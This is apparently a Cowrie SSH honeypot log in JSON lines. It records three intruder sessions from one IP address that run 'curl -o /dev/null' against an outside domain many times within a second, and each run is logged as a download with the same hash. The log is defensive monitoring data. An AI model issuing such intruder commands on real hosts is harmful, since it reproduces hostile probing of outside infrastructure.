{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.679145Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.681673Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.682536Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.683347Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.685250Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.685852Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.713663Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.714753Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.722300Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.724226Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.725379Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.726201Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.744963Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.745776Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.749278Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.750909Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.751760Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.755468Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.758167Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.776446Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.777255Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.781936Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.784779Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.787379Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.788473Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.789291Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.791314Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.792702Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.823803Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.825248Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.825937Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.830560Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.833471Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.834178Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.836275Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.837160Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.874520Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.875353Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.879575Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.883551Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.885322Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.886826Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.889040Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.890203Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.932365Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.933110Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.937865Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.939278Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.943076Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.946768Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.950941Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.951773Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.988810Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.990278Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.991230Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.994531Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.995747Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.004857Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.007610Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.036605Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.037693Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.042208Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.043282Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.046384Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.047371Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.081315Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.082083Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.110531Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.111350Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.115035Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.115614Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.118266Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.120599Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.122991Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.148449Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.149124Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.153400Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.155558Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.157659Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.159833Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.163801Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.164414Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
